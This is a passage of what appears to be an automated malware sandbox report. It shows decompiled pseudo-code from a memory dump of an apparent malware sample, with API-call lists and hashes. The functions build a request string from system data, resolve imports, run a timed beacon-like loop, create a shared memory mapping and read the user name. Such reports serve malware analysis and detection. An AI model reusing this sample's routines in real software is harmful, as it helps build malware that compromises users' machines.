                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x2b9d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x2b9d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x2b9d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E02B9D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t3 = _t64 + 0x2b9e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x2b9d02c,  *0x2b9d004, _t59);
                                                          				_t67 = E02B956CD();
                                                          				_t68 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t4 = _t68 + 0x2b9e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E02B958DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t7 = _t126 + 0x2b9e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x2b9d238, 0, _v8);
                                                          				}
                                                          				_t73 = E02B9A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t11 = _t121 + 0x2b9e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x2b9d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x2b9d32c; // 0x69b95b0
                                                          				_t75 = E02B94622(0x2b9d00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x2b9d238, _t152, _a16); // executed
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x2b9d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x2b9d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E02B9518F(GetTickCount());
                                                          					_t82 =  *0x2b9d32c; // 0x69b95b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x2b9d32c; // 0x69b95b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x2b9d32c; // 0x69b95b0
                                                          					_t148 = E02B91BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x2b9d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x2b9c28c);
                                                          					_push(_t148);
                                                          					_t94 = E02B9361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x2b9d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E02B99070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E02B96761();
                                                          						L22:
                                                          						HeapFree( *0x2b9d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E02B969B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E02B9391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E02B9A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E02B95800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E02B9A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B94ACA
                                                          • wsprintfA.USER32 ref: 02B94B1A
                                                          • wsprintfA.USER32 ref: 02B94B37
                                                          • wsprintfA.USER32 ref: 02B94B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94B75
                                                          • wsprintfA.USER32 ref: 02B94B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B94BD4
                                                          • GetTickCount.KERNEL32 ref: 02B94BE5
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B94BF9
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B94C17
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B91BB6: strcpy.NTDLL ref: 02B91C00
                                                            • Part of subcall function 02B91BB6: lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
                                                            • Part of subcall function 02B91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                          • StrTrimA.SHLWAPI(00000000,02B9C28C,?,069B95B0), ref: 02B94C4E
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9361A: lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                            • Part of subcall function 02B9361A: lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 02B94C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 02B94C77
                                                          • lstrcat.KERNEL32(?,?), ref: 02B94C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 02B94C8B
                                                            • Part of subcall function 02B99070: lstrlen.KERNEL32(?,00000000,069B9A98,00000000,02B98808,069B9C76,?,?,?,?,?,63699BC3,00000005,02B9D00C), ref: 02B99077
                                                            • Part of subcall function 02B99070: mbstowcs.NTDLL ref: 02B990A0
                                                            • Part of subcall function 02B99070: memset.NTDLL ref: 02B990B2
                                                          • wcstombs.NTDLL ref: 02B94D1C
                                                            • Part of subcall function 02B9391F: SysAllocString.OLEAUT32(?), ref: 02B9395A
                                                            • Part of subcall function 02B9391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02B939DD
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 02B94D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B94D69
                                                          • HeapFree.KERNEL32(00000000,?,?,069B95B0), ref: 02B94D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B94D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 02B94D8D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 9786ed7d80e3e5ef82d25956bb70b6b7942cfaa40930d2fb34544464fb3b200f
                                                          • Instruction ID: f3a23d36bf03fba571adefa54ecd77cb156c8e57433da8f0e3b0502e9f6414e7
                                                          • Opcode Fuzzy Hash: 9786ed7d80e3e5ef82d25956bb70b6b7942cfaa40930d2fb34544464fb3b200f
                                                          • Instruction Fuzzy Hash: 49917971940109AFCF11EFA9DD88AAEBBB9EF08390F1048A5F504E7260CB31D961DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E02B9AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x2b90000;
                                                          				_t115 = _t139[3] + 0x2b90000;
                                                          				_t131 = _t139[4] + 0x2b90000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x2b90000;
                                                          				_v16 = _t139[5] + 0x2b90000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x2b90002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x2b9d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x2b9d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x2b9d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x2b9d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x2b9d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x2b9d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x2b9d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x2b9d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02B9ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 02B9AD4B
                                                          • GetLastError.KERNEL32 ref: 02B9AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02B9AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: bf5e38f6ce47b16bd6d7875fa2c463e9ee2e73cbd75613bf8d74ee90da15f26d
                                                          • Instruction ID: 0705c496003b58c4fb2df0868b364e10ebd3b3904a56fabccae86d572d812261
                                                          • Opcode Fuzzy Hash: bf5e38f6ce47b16bd6d7875fa2c463e9ee2e73cbd75613bf8d74ee90da15f26d
                                                          • Instruction Fuzzy Hash: 96815C71A40605AFDF10CF99D980BAEBBF9FF48344F108469E945D7240EB70E950CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E02B951B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x2b9d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L02B9AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x2b9d26c; // 0x2e0
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x2b9d24c = 5;
                                                          						} else {
                                                          							_t68 = E02B98D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x2b9d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E02B9A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E02B936B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x2b9d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x2b9d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E02B96761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x2b9d248);
                                                          								L21:
                                                          								L02B9AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x2b9d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}





























                                                          APIs
                                                          • memset.NTDLL ref: 02B951C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02B951D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B951F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02B95212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B9522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B952C1
                                                          • CloseHandle.KERNEL32(?), ref: 02B952D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02B9530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02B95D5E,?), ref: 02B95320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B9532B
                                                            • Part of subcall function 02B98D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,069B9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02B98D63
                                                            • Part of subcall function 02B98D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,069B93A0,?,00000000,30314549,00000014,004F0053,069B935C), ref: 02B98E00
                                                            • Part of subcall function 02B98D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B9523E), ref: 02B98E12
                                                          • GetLastError.KERNEL32 ref: 02B9533D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: b21db8cd9654d672d83ac76fb118992a794fee46f186eae20503c0ca1438d82a
                                                          • Instruction ID: 0112ce16b69a97537fdd7dd7a3f4dfdeb2e7a0455058ae405f6915ccfcd76b3d
                                                          • Opcode Fuzzy Hash: b21db8cd9654d672d83ac76fb118992a794fee46f186eae20503c0ca1438d82a
                                                          • Instruction Fuzzy Hash: C0517B71C41228ABCF22AF95DD44AEEBFB9EF09760F604666E841E3180D7309650CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E02B9232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L02B9AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t5 = _t13 + 0x2b9e87e; // 0x69b8e26
                                                          				_t6 = _t13 + 0x2b9e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L02B9ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x2b9d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}














                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53,?,?), ref: 02B9233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02B92351
                                                          • _snwprintf.NTDLL ref: 02B92376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,02B9D2AC,00000004,00000000,00001000,?), ref: 02B92392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53), ref: 02B923A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02B923BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?), ref: 02B923DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53), ref: 02B923E4
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 9f8bf33074e8afe14156cff4daf282f78cee72eeaa9ea6fd03a756a8a941224e
                                                          • Instruction ID: 37a2a227d75b6045dc80344ae771f3c438ab9c741799e54e6278caee9fb5051c
                                                          • Opcode Fuzzy Hash: 9f8bf33074e8afe14156cff4daf282f78cee72eeaa9ea6fd03a756a8a941224e
                                                          • Instruction Fuzzy Hash: 8621CD72A84204BFDB11AFA8DC45F9E3BAAEB48740F214562FA05E71D0D7709A14CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E02B99135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x2b9d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E02B9A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x2b9d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x2b9d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
